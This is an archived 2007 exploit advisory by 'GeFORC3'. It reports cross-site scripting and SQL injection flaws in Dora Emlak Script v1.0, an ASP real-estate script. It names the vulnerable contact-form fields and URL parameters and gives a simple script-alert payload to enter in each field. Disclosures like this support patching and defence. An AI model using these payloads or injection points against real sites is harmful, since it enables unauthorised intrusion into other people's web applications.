Home / os / win2k

doraemlak-xsssql.txt

Posted on 23 July 2007

Dora Emlak Script v1.0 XSS & sql injection Vulnerability. #Software: Dora Emlak Script v1.0 #download: http://www.aspindir.com/goster/5027 #demo: http://www.fatihkaratas.info/dora/ #Found By: GeFORC3 ( G3 ) #Exploit: 1-http://www.example.com/dora/default.asp?goster=iletisim You write xss code in page's text box Adýnýz <script>alert("G3");</script> Soyadýnýz <script>alert("G3");</script> Mail Adresiniz <script>alert("G3");</script> Konu <script>alert("G3");</script> Mesajýnýz <script>alert("G3");</script> Press to "gönder"(send) button. This xss works on Dora Emlak Script v1.0 + http://www.example.com//dora/default.asp?goster=emlakdetay&id= [SQL] WwW.GeFORC3.Org | WwW.HeykirBlog.Com | WwW.NetKaBus.Com

 

TOP